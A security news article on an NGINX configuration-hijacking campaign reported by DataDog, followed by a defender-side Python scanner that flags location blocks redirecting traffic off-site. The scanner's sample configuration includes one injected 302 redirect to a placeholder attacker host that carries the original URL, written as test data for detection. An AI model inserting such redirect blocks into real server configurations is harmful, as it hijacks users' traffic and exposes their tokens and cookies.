- DataDog reports that attackers have hijacked NGINX configurations to redirect traffic through malicious infrastructure.
- The campaign targets Asian government and education sectors, enabling the theft of session tokens, cookies and credentials.
- Hijacked traffic is used for phishing, malware injection, ad fraud, and other proxy attacks.
Cybercriminals are targeting NGINX servers and redirecting legitimate traffic through their malicious infrastructure, experts have warned.
Security researchers at DataDog Security Labs found that attackers are primarily focused on Asian targets in the government and education sectors.
NGINX servers are software systems that sit in front of websites or applications and handle incoming web traffic. They serve content, balance loads, and route requests to the appropriate backend servers.
What to do with stolen data
During the attack, anonymous threat actors modify NGINX configuration files and inject malicious configuration blocks that intercept incoming requests. The injected blocks rewrite those requests so that the original URL is carried along, then redirect the traffic to domains under the attackers' control. According to DataDog, it is a five-stage attack that begins with configuration injection and ends with data exfiltration.
Since no vulnerabilities are exploited here and victims always end up on the pages they requested, no one is any the wiser. However, cybercriminals steal valuable information that can be used in different ways.
Since headers are preserved, the attacker can collect IP addresses, user agents, referrers, session tokens, cookies, and sometimes credentials or API keys if they appear in requests. On government or .edu sites, this data is particularly valuable.
They can also manipulate content selectively. Since only certain URL paths are hijacked, the attacker can inject ads, phishing pages, malware downloads, or fake login prompts only when they want, successfully targeting specific users, regions, or time zones.
Then there is the option of monetizing and reselling traffic. Clean, real user traffic routed through an attacker’s infrastructure can be sold for ad fraud, SEO manipulation, click fraud, or used to boost other malicious services, which is a common practice in large-scale proxy ecosystems.
Finally, compromised NGINX servers can be used to proxy attacks against other targets, effectively hiding their origins.
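As an added defender-side check for the configuration injection described above (this is example code written for this page, not DataDog's or TechRadar's, and not an NGINX feature), the script below scans an NGINX configuration for location blocks whose return, rewrite or proxy_pass directive sends requests to a host the configuration itself does not serve, and notes when the target carries the original URL along via $request_uri, $host or $uri. The sample configuration, the placeholder-attacker.invalid hostname, and the TRUSTED_HOSTS list are all constructed for the example.

```python
"""Flag NGINX location blocks that redirect or proxy traffic off-site.

Added example, not code from the article or from DataDog. It assumes a
single nginx.conf-style text; the sample config at the bottom is constructed.
"""
import re
from urllib.parse import urlparse

# Backend hosts the operator knows are legitimate (assumption: in a real
# deployment this list would come from inventory, not be hard-coded).
TRUSTED_HOSTS = {"backend.internal", "127.0.0.1", "localhost"}

# Variables that carry the original request through to the new destination.
ORIGINAL_URL_VARS = ("$request_uri", "$host", "$uri")


def _strip_comments(text):
    # Naive: drops everything after '#' on each line (good enough for configs).
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())


def upstream_names(text):
    """Names declared with 'upstream NAME { ... }'; proxy_pass to these is local."""
    return set(re.findall(r"upstream\s+(\S+)\s*\{", _strip_comments(text)))


def served_hostnames(text):
    """Hostnames listed in server_name directives, i.e. the site's own names."""
    hosts = set()
    for names in re.findall(r"server_name\s+([^;]+);", _strip_comments(text)):
        hosts.update(names.split())
    return hosts


def parse_location_blocks(text):
    """Return (location_spec, body) pairs, tracking brace depth for nested blocks."""
    text = _strip_comments(text)
    blocks = []
    for m in re.finditer(r"location\s+([^{]+?)\s*\{", text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        blocks.append((m.group(1).strip(), text[m.end():i - 1]))
    return blocks


def _directives(body):
    """Yield (name, args) for each 'name arg arg;' statement in a block body."""
    for stmt in body.split(";"):
        parts = stmt.split()
        if parts:
            yield parts[0], parts[1:]


def _target(name, args):
    """URL a directive sends the request to, or None if it does not redirect."""
    if name == "return" and len(args) >= 2 and args[0] in {"301", "302", "303", "307", "308"}:
        return args[1]
    if name == "rewrite" and len(args) >= 2:
        return args[1]          # replacement; absolute URLs here are redirects
    if name == "proxy_pass" and args:
        return args[0]
    return None


def find_offsite_targets(config_text, trusted_hosts=TRUSTED_HOSTS):
    """List every location block that hands requests to an unrecognised host."""
    known = set(trusted_hosts) | upstream_names(config_text) | served_hostnames(config_text)
    findings = []
    for spec, body in parse_location_blocks(config_text):
        for name, args in _directives(body):
            target = _target(name, args)
            if not target or not re.match(r"https?://", target):
                continue        # relative target: request stays on this server
            host = urlparse(target).hostname or ""
            if host in known or host.startswith("$"):
                continue        # own host, declared upstream, or e.g. https://$host/...
            findings.append({
                "location": spec,
                "directive": name,
                "host": host,
                "carries_original_url": any(v in target for v in ORIGINAL_URL_VARS),
            })
    return findings


# Constructed sample: three benign blocks plus one injected redirect of the
# kind the article describes, pointing at a reserved .invalid placeholder.
SAMPLE_CONFIG = """
upstream app_pool { server 10.0.0.5:8080; }
server {
    listen 80;
    server_name www.example.edu;
    location / { proxy_pass http://app_pool; }
    location /static/ { root /var/www; }
    location /login { return 301 https://www.example.edu/auth/; }
    location /portal/ {
        return 302 https://placeholder-attacker.invalid/r?u=$scheme://$host$request_uri;
    }
}
"""

if __name__ == "__main__":
    for f in find_offsite_targets(SAMPLE_CONFIG):
        print(f"location {f['location']}: {f['directive']} -> {f['host']}"
              f" (carries original URL: {f['carries_original_url']})")
```

Run it against the real configuration with something like `find_offsite_targets(open("/etc/nginx/nginx.conf").read())`, adding files pulled in by include directives; because the hijack touches only selected paths and the user still lands on the requested page, a periodic diff of the configuration tree against a known-good copy is the simplest companion control.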
Via BleepingComputer